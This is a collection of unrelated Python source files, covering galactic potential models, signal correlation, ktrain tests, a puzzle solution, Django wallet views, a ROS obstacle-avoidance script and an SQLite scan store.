plt.plot(pos[0], mass[i]/mass[0], '-', color=colors[i], label=name[i])
plt.axvline(25, color='k', ls=':')
plt.legend(fontsize='small', loc=0)
plt.ylim(0.7, 1.3)
plt.xlim(0,200)
plt.xlabel('r [kpc]')
plt.ylabel('M(<r) / M$_{fid}$(<r)')
plt.tight_layout()
plt.savefig('../plots/response/enclosed_mass_potentials.png')
|
py | 1a37d6a939837438c460616078dc3ea93b5060c6 | ###############################################################################
# TwoPowerTriaxialPotential.py: General class for triaxial potentials
# derived from densities with two power-laws
#
# amp/[4pia^3]
# rho(r)= ------------------------------------
# (m/a)^\alpha (1+m/a)^(\beta-\alpha)
#
# with
#
# m^2 = x^2 + y^2/b^2 + z^2/c^2
###############################################################################
import numpy
from scipy import special
from .Potential import _APY_LOADED
from .EllipsoidalPotential import EllipsoidalPotential
if _APY_LOADED:
from astropy import units
class TwoPowerTriaxialPotential(EllipsoidalPotential):
"""Class that implements triaxial potentials that are derived from
two-power density models
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)^\\alpha\\,(1+m/a)^{\\beta-\\alpha}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
Note that this general class of potentials does *not* automatically revert to the special TriaxialNFWPotential, TriaxialHernquistPotential, or TriaxialJaffePotential when using their (alpha,beta) values (like TwoPowerSphericalPotential).
"""
def __init__(self,amp=1.,a=5.,alpha=1.5,beta=3.5,b=1.,c=1.,
zvec=None,pa=None,glorder=50,
normalize=False,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
initialize a triaxial two-power-density potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
alpha - inner power (0 <= alpha < 3)
beta - outer power ( beta > 2)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis (rad or Quantity)
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2016-05-30 - Started - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
if beta <= 2. or alpha < 0. or alpha >= 3.:
raise IOError('TwoPowerTriaxialPotential requires 0 <= alpha < 3 and beta > 2')
self.alpha= alpha
self.beta= beta
self.betaminusalpha= self.beta-self.alpha
self.twominusalpha= 2.-self.alpha
self.threeminusalpha= 3.-self.alpha
if self.twominusalpha != 0.:
self.psi_inf= special.gamma(self.beta-2.)\
*special.gamma(3.-self.alpha)\
/special.gamma(self.betaminusalpha)
# Adjust amp
self._amp/= (4.*numpy.pi*self.a**3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
if self.twominusalpha == 0.:
return -2.*self.a**2*(self.a/m)**self.betaminusalpha\
/self.betaminusalpha\
*special.hyp2f1(self.betaminusalpha,
self.betaminusalpha,
self.betaminusalpha+1,
-self.a/m)
else:
return -2.*self.a**2\
*(self.psi_inf-(m/self.a)**self.twominusalpha\
/self.twominusalpha\
*special.hyp2f1(self.twominusalpha,
self.betaminusalpha,
self.threeminusalpha,
-m/self.a))
def _mdens(self,m):
"""Density as a function of m"""
return (self.a/m)**self.alpha/(1.+m/self.a)**(self.betaminusalpha)
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self._mdens(m)*(self.a*self.alpha+self.beta*m)/m/(self.a+m)
class TriaxialHernquistPotential(EllipsoidalPotential):
"""Class that implements the triaxial Hernquist potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)\\,(1+m/a)^{3}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,normalize=False,b=1.,c=1.,zvec=None,pa=None,
glorder=50,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
Initialize a triaxial Hernquist potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2010-07-09 - Written - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
# Adjust amp
self.a4= self.a**4
self._amp/= (4.*numpy.pi*self.a**3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)):
self.normalize(normalize)
        self.hasC = self._glorder is not None
self.hasC_dxdv= False
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return -self.a4/(m+self.a)**2.
def _mdens(self,m):
"""Density as a function of m"""
return self.a4/m/(m+self.a)**3
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self.a4*(self.a+4.*m)/m**2/(self.a+m)**4
class TriaxialJaffePotential(EllipsoidalPotential):
"""Class that implements the Jaffe potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)^2\\,(1+m/a)^{2}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,b=1.,c=1.,zvec=None,pa=None,normalize=False,
glorder=50,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
Initialize a Jaffe potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2010-07-09 - Written - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
# Adjust amp
self.a2= self.a**2
self._amp/= (4.*numpy.pi*self.a2*self.a)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
        self.hasC = self._glorder is not None
self.hasC_dxdv= False
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return 2.*self.a2*(1./(1.+m/self.a)+numpy.log(m/(m+self.a)))
def _mdens(self,m):
"""Density as a function of m"""
return self.a2/m**2/(1.+m/self.a)**2
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -2.*self.a2**2*(self.a+2.*m)/m**3/(self.a+m)**3
class TriaxialNFWPotential(EllipsoidalPotential):
"""Class that implements the triaxial NFW potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)\\,(1+m/a)^{2}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,b=1.,c=1.,zvec=None,pa=None,
normalize=False,
conc=None,mvir=None,
glorder=50,vo=None,ro=None,
H=70.,Om=0.3,overdens=200.,wrtcrit=False):
"""
NAME:
__init__
PURPOSE:
Initialize a triaxial NFW potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
Alternatively, NFW potentials can be initialized using
conc= concentration
mvir= virial mass in 10^12 Msolar
in which case you also need to supply the following keywords
H= (default: 70) Hubble constant in km/s/Mpc
Om= (default: 0.3) Omega matter
overdens= (200) overdensity which defines the virial radius
wrtcrit= (False) if True, the overdensity is wrt the critical density rather than the mean matter density
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2016-05-30 - Written - Bovy (UofT)
2018-08-06 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
if conc is None:
self.a= a
else:
from galpy.potential import NFWPotential
dum= NFWPotential(mvir=mvir,conc=conc,ro=self._ro,vo=self._vo,
H=H,Om=Om,wrtcrit=wrtcrit,overdens=overdens)
self.a= dum.a
self._amp= dum._amp
self._scale= self.a
        self.hasC = self._glorder is not None
self.hasC_dxdv= False
# Adjust amp
self.a3= self.a**3
self._amp/= (4.*numpy.pi*self.a3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)):
self.normalize(normalize)
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return -2.*self.a3/(self.a+m)
def _mdens(self,m):
"""Density as a function of m"""
return self.a/m/(1.+m/self.a)**2
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self.a3*(self.a+3.*m)/m**2/(self.a+m)**3
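# Minimal usage sketch (illustrative, not from galpy itself): build a triaxial
# NFW halo normalized to the radial force at R=1 and query its density on the
# major axis; the argument values below are arbitrary.
if __name__ == '__main__':
    tnfw= TriaxialNFWPotential(normalize=1.,a=2.,b=0.9,c=0.7)
    print(tnfw.dens(1.,0.))  # density at (R,z)=(1,0) in internal units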
|
py | 1a37d725246250bc16547e700bb736dcaad970fc | # -*- coding: utf-8 -*-
# Copyright (c) St. Anne's University Hospital in Brno. International Clinical
# Research Center, Biomedical Engineering. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Std imports
# Third pary imports
import numpy as np
# Local imports
from ..utils.method import Method
def compute_lincorr(sig, lag=0, lag_step=0):
"""
Linear correlation (Pearson's coefficient) between two time series
When lag and lag_step is not 0, shifts the sig[1] from negative
to positive lag and takes the max correlation (best fit)
Parameters
----------
sig: np.array
2D numpy array of shape (signals, samples), time series (int, float)
lag: int
negative and positive shift of time series in samples
lag_step: int
step of shift
Returns
-------
    max_corr: float
        maximum linear correlation over the tested shifts
tau: float
shift of maximum correlation in samples,
value in range <-lag,+lag> (float)
tau<0: sig[1] -> sig[0]
tau>0: sig[0] -> sig[1]
Example
-------
lincorr,tau = compute_lincorr(sig, 200, 20)
"""
    if not isinstance(sig, np.ndarray):
        raise TypeError("Signals have to be in a numpy array!")
if lag == 0:
lag_step = 1
nstep_lag = int(lag * 2 / lag_step)
sig1_w = sig[0]
sig2_w = sig[1]
sig1_wl = sig1_w[lag:len(sig1_w) - lag]
lincorr = []
for i in range(0, nstep_lag + 1):
ind1 = i * lag_step
ind2 = ind1 + len(sig1_wl)
sig2_wl = sig2_w[ind1:ind2]
corr_val = np.corrcoef(sig1_wl, sig2_wl)
lincorr.append(corr_val[0][1])
    max_idx = int(np.argmax(lincorr))
    tau = max_idx * lag_step - lag
    return lincorr[max_idx], tau
class LinearCorrelation(Method):
algorithm = 'LINEAR_CORRELATION'
algorithm_type = 'bivariate'
version = '1.0.0'
dtype = [('max_corr', 'float32'),
('tau', 'float32')]
def __init__(self, **kwargs):
"""
Linear correlation (Pearson's coefficient) between two time series
When win and win_step is not 0, calculates evolution of correlation
When win>len(sig) or win<=0, calculates only one corr coef
When lag and lag_step is not 0, shifts the sig[1] from negative
to positive lag and takes the max correlation (best fit)
Parameters
----------
lag: int
negative and positive shift of time series in samples
lag_step: int
step of shift
"""
super().__init__(compute_lincorr, **kwargs)
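# Quick self-check sketch (illustrative, not part of the package): correlate a
# sine with a copy of itself delayed by 10 samples; the recovered tau should
# come out close to +10.
if __name__ == '__main__':
    t = np.arange(1000)
    x = np.sin(2 * np.pi * t / 100)
    sig = np.vstack([x, np.roll(x, 10)])
    print(compute_lincorr(sig, lag=20, lag_step=1))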
|
py | 1a37d819478ad011750e3190bb2ab7de907a805e | #!/usr/bin/env python3
"""
Tests of ktrain text classification flows
"""
import testenv
import numpy as np
from unittest import TestCase, main, skip
import ktrain
from ktrain.imports import ACC_NAME, VAL_ACC_NAME
from ktrain import utils as U
Sequential = ktrain.imports.keras.models.Sequential
Dense = ktrain.imports.keras.layers.Dense
Embedding = ktrain.imports.keras.layers.Embedding
GlobalAveragePooling1D = ktrain.imports.keras.layers.GlobalAveragePooling1D
def synthetic_multilabel():
# data
X = [[1,0,0,0,0,0,0],
[1,2,0,0,0,0,0],
[3,0,0,0,0,0,0],
[3,4,0,0,0,0,0],
[2,0,0,0,0,0,0],
[3,0,0,0,0,0,0],
[4,0,0,0,0,0,0],
[2,3,0,0,0,0,0],
[1,2,3,0,0,0,0],
[1,2,3,4,0,0,0],
[0,0,0,0,0,0,0],
[1,1,2,3,0,0,0],
[2,3,3,4,0,0,0],
[4,4,1,1,2,0,0],
[1,2,3,3,3,3,3],
[2,4,2,4,2,0,0],
[1,3,3,3,0,0,0],
[4,4,0,0,0,0,0],
[3,3,0,0,0,0,0],
[1,1,4,0,0,0,0]]
Y = [[1,0,0,0],
[1,1,0,0],
[0,0,1,0],
[0,0,1,1],
[0,1,0,0],
[0,0,1,0],
[0,0,0,1],
[0,1,1,0],
[1,1,1,0],
[1,1,1,1],
[0,0,0,0],
[1,1,1,0],
[0,1,1,1],
[1,1,0,1],
[1,1,1,0],
[0,1,0,0],
[1,0,1,0],
[0,0,0,1],
[0,0,1,0],
[1,0,0,1]]
X = np.array(X)
Y = np.array(Y)
return (X, Y)
class TestMultilabel(TestCase):
def test_multilabel(self):
X, Y = synthetic_multilabel()
self.assertTrue(U.is_multilabel( (X,Y)))
MAXLEN = 7
MAXFEATURES = 4
NUM_CLASSES = 4
model = Sequential()
model.add(Embedding(MAXFEATURES+1,
50,
input_length=MAXLEN))
model.add(GlobalAveragePooling1D())
model.add(Dense(NUM_CLASSES, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
learner = ktrain.get_learner(model,
train_data=(X, Y),
val_data=(X, Y),
batch_size=1)
learner.lr_find(max_epochs=5) # use max_epochs until TF 2.4
# use loss instead of accuracy due to: https://github.com/tensorflow/tensorflow/issues/41114
hist = learner.fit(0.001, 200)
learner.view_top_losses(n=5)
learner.validate()
#final_acc = hist.history[VAL_ACC_NAME][-1]
#print('final_accuracy:%s' % (final_acc))
#self.assertGreater(final_acc, 0.97)
final_loss = hist.history['val_loss'][-1]
print('final_loss:%s' % (final_loss))
self.assertLess(final_loss, 0.05)
if __name__ == "__main__":
main()
|
py | 1a37d84e30f7c24ea250aecde1ec9c3143480760 | #!/usr/bin/env python3
import pytest
import sys
import fileinput
from os.path import splitext, abspath
F_NAME = splitext(abspath(__file__))[0][:-1]
def answer(lines):
tot = 0
for line in map(str.strip, lines):
print(line)
l, w, h = map(int, line.split('x'))
sides = []
sides.append(l*w)
sides.append(w*h)
sides.append(h*l)
print(sides)
        tot += 2*sum(sides) + min(sides)  # add area of the smallest side as slack
return tot
@pytest.mark.parametrize( "inp,outp", [
(['2x3x4'], 58),
(['1x1x10'], 43),
])
def test_answer(inp, outp):
assert answer(inp) == outp
if __name__ == '__main__':
print(answer(fileinput.input(F_NAME + '.input')))
|
py | 1a37daaae2173c94118a8b0149b17ac69efe795c | from django.shortcuts import render
from .models import WalletAccount, WalletCredit, WalletDeposit, WalletIncome, WalletExpense, WalletCar, WalletHouse
def wallet_generator_year_month(request, year, month):
year_prev = int(year) - 1 if int(month) == 1 else year
month_prev = int(month) - 1 if int(month) > 1 else 12
filterArgsByYearMonth = {'year': year_prev, 'month': month_prev}
wallet_accounts = WalletAccount.objects.filter(**filterArgsByYearMonth).order_by('-type', 'name')
wallet_deposits = WalletDeposit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_credits = WalletCredit.objects.filter(**filterArgsByYearMonth).order_by('name')
filterArgsByYearMonthRegular = {'year': year_prev, 'month': month_prev, 'type': 'regular'}
wallet_incomes = WalletIncome.objects.filter(**filterArgsByYearMonthRegular).order_by('type', 'name')
wallet_expenses = WalletExpense.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_houses = WalletHouse.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_cars = WalletCar.objects.filter(**filterArgsByYearMonth).order_by('exploitation')
log = []
for wallet_account in wallet_accounts:
log.append("New account \"" + str(wallet_account.name) + " " + str(wallet_account.value) + " " + str(wallet_account.currency) + " " + str(wallet_account.type) + "\"")
WalletAccount.objects.create(name=wallet_account.name,
value=wallet_account.value,
currency=wallet_account.currency,
type=wallet_account.type,
year=year,
month=month)
log.append("")
for wallet_deposit in wallet_deposits:
log.append("New deposit \"" + str(wallet_deposit.name) + " " + str(wallet_deposit.value) + " " + str(wallet_deposit.rate) + "\"")
WalletDeposit.objects.create(name=wallet_deposit.name,
value=wallet_deposit.value,
rate=wallet_deposit.rate,
year=year,
month=month)
log.append("")
for wallet_credit in wallet_credits:
log.append("New credit \"" + str(wallet_credit.name) + " " + str(wallet_credit.value) + " " + str(wallet_credit.rate) + " " + str(wallet_credit.balance) + "\"")
WalletCredit.objects.create(name=wallet_credit.name,
value=wallet_credit.value,
rate=wallet_credit.rate,
balance=wallet_credit.balance,
interest=0.0,
insurance=0.0,
capital=0.0,
year=year,
month=month)
log.append("")
for wallet_income in wallet_incomes:
log.append("New income \"" + str(wallet_income.name) + " " + str(wallet_income.type) + "\"")
WalletIncome.objects.create(name=wallet_income.name,
value=0.0,
type=wallet_income.type,
year=year,
month=month)
log.append("")
for wallet_expense in wallet_expenses:
log.append("New expense \"" + str(wallet_expense.name) + "\"")
WalletExpense.objects.create(name=wallet_expense.name,
value=0.0,
type=wallet_expense.type,
year=year,
month=month)
log.append("")
for wallet_house in wallet_houses:
log.append("New house \"" + str(wallet_house.name) + "\"")
WalletHouse.objects.create(name=wallet_house.name,
value=0.0,
year=year,
month=month)
wallet_car = wallet_cars.last()
if wallet_car:
log.append("")
log.append("New car \"" + str(wallet_car.car) + " " + str(wallet_car.exploitation) + "\"")
WalletCar.objects.create(car=wallet_car.car,
exploitation=wallet_car.exploitation,
refuelling=0.0,
payment=0.0,
year=year,
month=month)
return render(request, 'app/wallet_generator.html', {
'year': year,
'month': month,
'log': log
})
def wallet_clear_year_month(request, year, month):
filterArgsByYearMonth = {'year': year, 'month': month}
wallet_accounts = WalletAccount.objects.filter(**filterArgsByYearMonth).order_by('-type', 'name')
wallet_deposits = WalletDeposit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_credits = WalletCredit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_incomes = WalletIncome.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_expenses = WalletExpense.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_houses = WalletHouse.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_cars = WalletCar.objects.filter(**filterArgsByYearMonth).order_by('exploitation')
log = []
for wallet_account in wallet_accounts:
log.append("Clear account \"" + str(wallet_account.name) + " " + str(wallet_account.value) + " " + str(wallet_account.type) + "\"")
WalletAccount.objects.get(id=wallet_account.id).delete()
log.append("")
for wallet_deposit in wallet_deposits:
log.append("Clear deposit \"" + str(wallet_deposit.name) + " " + str(wallet_deposit.value) + " " + str(wallet_deposit.rate) + "\"")
WalletDeposit.objects.get(id=wallet_deposit.id).delete()
log.append("")
for wallet_credit in wallet_credits:
log.append("Clear credit \"" + str(wallet_credit.name) + " " + str(wallet_credit.value) + " " + str(wallet_credit.rate) + " " + str(wallet_credit.balance) + "\"")
WalletCredit.objects.get(id=wallet_credit.id).delete()
log.append("")
for wallet_income in wallet_incomes:
log.append("Clear income \"" + str(wallet_income.name) + " " + str(wallet_income.type) + "\"")
WalletIncome.objects.get(id=wallet_income.id).delete()
log.append("")
for wallet_expense in wallet_expenses:
log.append("Clear expense \"" + str(wallet_expense.name) + "\"")
WalletExpense.objects.get(id=wallet_expense.id).delete()
log.append("")
for wallet_house in wallet_houses:
log.append("Clear house \"" + str(wallet_house.name) + "\"")
WalletHouse.objects.get(id=wallet_house.id).delete()
log.append("")
for wallet_car in wallet_cars:
log.append("Clear car \"" + str(wallet_car.car) + " " + str(wallet_car.exploitation) + "\"")
WalletCar.objects.get(id=wallet_car.id).delete()
return render(request, 'app/wallet_generator.html', {
'year': year,
'month': month,
'log': log
}) |
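# Hypothetical URL wiring for these function views (names and paths are
# illustrative, not taken from the project):
#
#   from django.urls import path
#   urlpatterns = [
#       path('wallet/generate/<int:year>/<int:month>/', wallet_generator_year_month),
#       path('wallet/clear/<int:year>/<int:month>/', wallet_clear_year_month),
#   ]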
py | 1a37dc146631bfd3f4cafa02ea714e65c7432d1b | #!/usr/bin/env python
import rospy
import math
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Float32
from kobuki_msgs.msg import BumperEvent
from kobuki_msgs.msg import CliffEvent
import sys, select, termios, tty
range_center = Float32()
range_left = Float32()
range_right = Float32()
range_left_last = Float32()
range_right_last = Float32()
turnAngle = 17
backUpDistance = 6
speed = 0.5
def callback(data):
#rospy.loginfo("Center: %f", data.ranges[359])
#rospy.loginfo("Left: %f", data.ranges[180])
#rospy.loginfo("Right: %f", data.ranges[540])
range_center.data = data.ranges[359]
range_left.data = data.ranges[180]
range_right.data = data.ranges[540]
def processBump(data):
print ("Bump!")
global bp
global which_bp
if (data.state == BumperEvent.PRESSED):
bp = True
else:
bp = False
rospy.loginfo("Bumper Event")
rospy.loginfo(data.bumper)
which_bp = data.bumper
def processCliff(data):
print ("Cliff!")
global cf
global which_cf
global dis
if (data.state == CliffEvent.CLIFF):
cf = True
else:
cf = False
rospy.loginfo("Cliff Event")
rospy.loginfo(data.sensor)
which_cf = data.sensor
dis = data.bottom
def set_normal_speed():
twist.linear.x = speed
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 0
def turn_left():
twist.linear.x = 0
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 1 * speed
def turn_right():
twist.linear.x = 0
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = -1 * speed
def set_backup_speed():
twist.linear.x = -1 * speed
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 0
# mode = {'forward', 'backup', 'turnLeft', 'turnRight'}
def move():
pub = rospy.Publisher('mobile_base/commands/velocity', Twist, queue_size = 20)
sub1 = rospy.Subscriber("scan", LaserScan, callback)
sub2 = rospy.Subscriber('mobile_base/events/bumper', BumperEvent, processBump)
sub3 = rospy.Subscriber('mobile_base/events/cliff', CliffEvent, processCliff)
rospy.init_node('test', anonymous = True)
rate = rospy.Rate(10) # 10HZ
global twist, mode, cf, which_cf, which_bp, dis, bp
cf = False
which_cf = 0
which_bp = 0
twist = Twist()
left, right, bp = False, False, False
mode = 'Forward'
BackupCounter = 0
TurnRightCounter, TurnLeftCounter = 0, 0
ignoreCliff = False
while not rospy.is_shutdown():
if (mode == 'Forward'):
set_normal_speed()
elif (mode == 'Backup'):
ignoreCliff = True
set_backup_speed()
BackupCounter += 1
elif (mode == 'TurnLeft'):
ignoreCliff = False
left = False
turn_left()
TurnLeftCounter += 1
elif (mode == 'TurnRight'):
ignoreCliff = False
right = False
turn_right()
TurnRightCounter += 1
pub.publish(twist)
if (left and BackupCounter > backUpDistance):
BackupCounter = 0
mode = 'TurnLeft'
if (right and BackupCounter > backUpDistance):
BackupCounter = 0
mode = 'TurnRight'
if (TurnRightCounter > turnAngle):
TurnRightCounter = 0
mode = 'Forward'
if (TurnLeftCounter > turnAngle):
TurnLeftCounter = 0
mode = 'Forward'
# if (range_center.data > 1 and not mode == 'Backup' and not mode == 'TurnLeft' and not mode == 'TurnRight'):
# if (range_left.data < 0.2):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = True, False
# elif (range_right.data < 0.2):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = False, True
# elif (range_center.data < 1 and range_center.data > 0.001):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = False, True
if (not ignoreCliff and cf and which_cf == 0):
if (dis < 50000):
which_cf = 0
mode = 'Backup'
print("left cliff")
if (not right and not left):
BackupCounter = 0
right, left = True, False
elif (not ignoreCliff and cf and (which_cf == 2 or which_cf == 1)):
if (dis < 50000):
which_cf = 0
print("right cliff")
mode = 'Backup'
if (not right and not left):
BackupCounter = 0
right, left = False, True
if (bp and which_bp == 0):
which_bp = 0
mode = 'Backup'
print("left bump")
if (not right and not left):
BackupCounter = 0
right, left = True, False
elif (bp and (which_bp == 2 or which_bp == 1)):
which_bp = 0
print("right bump")
mode = 'Backup'
if (not right and not left):
BackupCounter = 0
right, left = False, True
print(mode)
rate.sleep()
if __name__ == '__main__':
try:
move()
except rospy.ROSInterruptException:
pass
|
py | 1a37dd32ce47c45f9d1c087f07656eddbe7ee23a | import numpy as np
import pandas as pd
import os
import sqlalchemy
from time import sleep
import pickle
from numbers import Number
def serialize(x):
if not isinstance(x, (str, Number)):
return pickle.dumps(x)
else:
return x
def unserialize(x):
if not isinstance(x, (str, Number)):
return pickle.loads(x)
else:
return x
class ScanStoreSQL(object):
"""Generic SQLite parameter scan store."""
def __init__(self, scanname, scanid=1, datadir=None):
self.scanname = scanname
        self.scanid = scanid
if datadir is None:
datadir = os.getcwd()
self.datadir = datadir
_filename = '{}_{}.sqlite'.format(scanname, scanid)
self.filename = os.path.join(self.datadir, _filename)
@property
def engine(self):
return sqlalchemy.create_engine('sqlite:///' + self.filename)
def store_df(self, key, df, append=True, **kwargs):
"""Store a Pandas DataFrame in a table."""
if_exists = 'append' if append else 'replace'
while True:
try:
df.applymap(serialize).to_sql(key, self.engine, if_exists=if_exists)
break
except sqlalchemy.exc.OperationalError:
sleep(0.001)
def store_row(self, key, array, index=0, columns=None, append=True, **kwargs):
"""Store a numpy array or a list in a table."""
df = pd.DataFrame([array], columns=columns, index=(index,))
self.store_df(key, df, append=append)
def store_dict(self, key, dict, index=0, append=True, **kwargs):
"""Store a dictionary in a table."""
self.store_row(key,
array=list(dict.values()),
index=index,
columns=list(dict.keys()),
**kwargs)
def store_array(self, key, array, index=None, columns=None, append=True, **kwargs):
"""Store a numpy array in a table."""
